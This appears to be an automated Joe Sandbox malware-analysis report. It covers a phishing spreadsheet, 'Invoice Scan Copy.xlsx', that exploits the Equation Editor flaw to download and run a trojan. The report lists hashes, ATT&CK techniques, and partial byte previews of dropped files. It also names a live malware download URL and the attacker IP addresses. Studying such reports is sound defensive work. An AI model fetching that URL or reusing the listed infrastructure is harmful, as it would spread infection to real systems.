    Source: C:\Users\Public\vbc.exeCode function: 6_2_0040285A mov ebx, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004027D8 mov ebx, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F882F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F6025 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F3218 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F9735 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F8178 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003F3DDD mov eax, dword ptr fs:[00000030h]
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: vbc.exe, 00000006.00000002.688494156.0000000000920000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: vbc.exe, 00000006.00000002.688494156.0000000000920000.00000002.00020000.sdmpBinary or memory string: !Progman
    Source: vbc.exe, 00000006.00000002.688494156.0000000000920000.00000002.00020000.sdmpBinary or memory string: Program Manager<

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection12Masquerading111OS Credential DumpingSecurity Software Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol121SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Information Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Invoice Scan Copy.xlsx26%ReversingLabsDocument-Word.Exploit.CVE-2017-11882

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe29%ReversingLabsWin32.Trojan.Mucc
    C:\Users\Public\vbc.exe29%ReversingLabsWin32.Trojan.Mucc

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://192.3.141.149/monday/bin.exe0%Avira URL Cloudsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://192.3.141.149/monday/bin.exetrue
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkvbc.exe, 00000006.00000002.688949891.0000000002807000.00000002.00020000.sdmpfalse
      high
      http://www.icra.org/vocabulary/.vbc.exe, 00000006.00000002.688949891.0000000002807000.00000002.00020000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://windowsmedia.com/redir/services.asp?WMPFriendly=truevbc.exe, 00000006.00000002.688949891.0000000002807000.00000002.00020000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://www.day.com/dam/1.038D58F94.emf.0.drfalse
        high

        Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public

        IPDomainCountryFlagASNASN NameMalicious
        192.3.141.149
        unknownUnited States
        36352AS-COLOCROSSINGUStrue

        General Information

        Joe Sandbox Version:33.0.0 White Diamond
        Analysis ID:482507
        Start date:13.09.2021
        Start time:20:44:48
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 5m 38s
        Hypervisor based Inspection enabled:false
        Report type:light
        Sample file name:Invoice Scan Copy.xlsx
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:7
        Number of new started drivers analysed:2
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.expl.winXLSX@4/21@0/1
        EGA Information:Failed
        HDC Information:
        • Successful, ratio: 39.5% (good quality ratio 22.9%)
        • Quality average: 26.3%
        • Quality standard deviation: 27.3%
        HCA Information:Failed
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .xlsx
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        Warnings:
        Show All
        • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, svchost.exe
        • TCP Packets have been reduced to 100
        • Report size getting too big, too many NtCreateFile calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/482507/sample/Invoice Scan Copy.xlsx

        Simulations

        Behavior and APIs

        TimeTypeDescription
        20:45:46API Interceptor37x Sleep call for process: EQNEDT32.EXE modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        192.3.141.149LOI _FOB$$ #NEW STEEL DRUM 082021.xlsxGet hashmaliciousBrowse
        • 192.3.141.149/fresh/bin.exe
        Payment Swift ref. 0000378062021.xlsxGet hashmaliciousBrowse
        • 192.3.141.149/xpay/BIN.exe
        MT 130,000 BW SEAGRACE DOCUMENTS.xlsxGet hashmaliciousBrowse
        • 192.3.141.149/xpay/BIN.exe

        Domains

        No context

        ASN

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        AS-COLOCROSSINGUSURGENT ORDER(TB-0008)-21 full.xlsxGet hashmaliciousBrowse
        • 192.3.146.254
        New Order.xlsxGet hashmaliciousBrowse
        • 23.95.13.175
        PO530CB.docxGet hashmaliciousBrowse
        • 198.46.199.161
        PO530CB.docxGet hashmaliciousBrowse
        • 198.46.199.161
        New_Order.xlsxGet hashmaliciousBrowse
        • 23.95.13.175
        nirvana.i586Get hashmaliciousBrowse
        • 23.94.24.109
        09112021_pdf.vbsGet hashmaliciousBrowse
        • 23.94.82.41
        armGet hashmaliciousBrowse
        • 192.210.189.186
        OA9862qYq7.exeGet hashmaliciousBrowse
        • 75.127.1.230
        skid.x86Get hashmaliciousBrowse
        • 23.95.230.108
        1F2nMkl09BGet hashmaliciousBrowse
        • 23.95.230.108
        m7i42ZEOwQGet hashmaliciousBrowse
        • 23.95.230.108
        DUz0tkQgdsGet hashmaliciousBrowse
        • 23.95.230.108
        B04DkMODlXGet hashmaliciousBrowse
        • 23.95.230.108
        Yj738UduyXGet hashmaliciousBrowse
        • 23.95.230.108
        VrflhtSfz4Get hashmaliciousBrowse
        • 23.95.230.108
        DdU1LcIRIEGet hashmaliciousBrowse
        • 23.95.230.108
        ZboowBSN5bGet hashmaliciousBrowse
        • 192.3.80.128
        z8nZFi6CIlGet hashmaliciousBrowse
        • 192.3.80.128
        SgtN1EcGflGet hashmaliciousBrowse
        • 192.3.80.128

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe
        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:downloaded
        Size (bytes):114688
        Entropy (8bit):5.922781856329279
        Encrypted:false
        SSDEEP:1536:xo2acYtmTskMt0qDKxxNSoxhNCEtmzlrEe07W+YJ+:FatmTTMtCxNSo55Ylr6YJ+
        MD5:F378C63405C6FA0B24C2E4C142C42E9F
        SHA1:A8751014349135E8D4B13CB947444AD6C222588C
        SHA-256:44EACB84C8AE24A115769DB8BB7FCA7D2AD14CF70A905BB57D54B175FFA4DA60
        SHA-512:629DBA1401657DC2C56265E7A8A9F71F017D3B2A249327DF7C30669FEB18C3C543CC4270B9640905CB32F97559332E4670759DD002F45331DBD98C3D100228F2
        Malicious:true
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 29%
        Reputation:low
        IE Cache URL:http://192.3.141.149/monday/bin.exe
        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L...Wp.J.................`...P...............p....@.............B...................-........................................h..(........1..................................................................(... .......X............................text....].......`.................. ..`.data...4....p.......p..............@....rsrc....1.......@..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1A302B6C.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
        Category:dropped
        Size (bytes):7006
        Entropy (8bit):7.000232770071406
        Encrypted:false
        SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
        MD5:971312D4A6C9BE9B496160215FE59C19
        SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
        SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
        SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2768058F.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):33795
        Entropy (8bit):7.909466841535462
        Encrypted:false
        SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
        MD5:613C306C3CC7C3367595D71BEECD5DE4
        SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
        SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
        SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\38D58F94.emf
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):648132
        Entropy (8bit):2.8121791667096874
        Encrypted:false
        SSDEEP:3072:z34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:74UcLe0JOcXuunhqcS
        MD5:31377C397CA398A548EF1AC6B21460A2
        SHA1:4C60622C16970484A9D4E5312FF4DE878F2CCAB8
        SHA-256:3B5F9DC42F3265979EF286C6A2B6720A72EF5B440D63F2851E513E2253E801A7
        SHA-512:94467580210264EF642EAFD58B3EF8C2A9601E297A03E4AF70ADCC5A09A75696F5A9F0DE2610CE79DFA54B6EBDE325E0F049D83FE4025129AC6F1E716DC9B451
        Malicious:false
        Reputation:low
        Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Y$...../..f.Y.@V.%...t./.../......./.../.RQ$[../.../......./.../.$Q$[../.../. ...Id.Y../.../. ............d.Y............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i............./.X...../.H./..8.Y........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FB47DA1.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
        Category:dropped
        Size (bytes):49744
        Entropy (8bit):7.99056926749243
        Encrypted:true
        SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
        MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
        SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
        SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
        SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\43E1DB19.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
        Category:dropped
        Size (bytes):49744
        Entropy (8bit):7.99056926749243
        Encrypted:true
        SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
        MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
        SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
        SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
        SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\651DD978.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
        Category:dropped
        Size (bytes):14198
        Entropy (8bit):7.916688725116637
        Encrypted:false
        SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
        MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
        SHA1:72CA86D260330FC32246D28349C07933E427065D
        SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
        SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
        Malicious:false
        Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6AF1872E.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):6815
        Entropy (8bit):7.871668067811304
        Encrypted:false
        SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
        MD5:E2267BEF7933F02C009EAEFC464EB83D
        SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
        SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
        SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
        Malicious:false
        Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CD94093.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
        Category:dropped
        Size (bytes):8815
        Entropy (8bit):7.944898651451431
        Encrypted:false
        SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
        MD5:F06432656347B7042C803FE58F4043E1
        SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
        SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
        SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
        Malicious:false
        Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\760C7575.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):84203
        Entropy (8bit):7.979766688932294
        Encrypted:false
        SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
        MD5:208FD40D2F72D9AED77A86A44782E9E2
        SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
        SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
        SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
        Malicious:false
        Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A06E1BDB.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
        Category:dropped
        Size (bytes):8815
        Entropy (8bit):7.944898651451431
        Encrypted:false
        SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
        MD5:F06432656347B7042C803FE58F4043E1
        SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
        SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
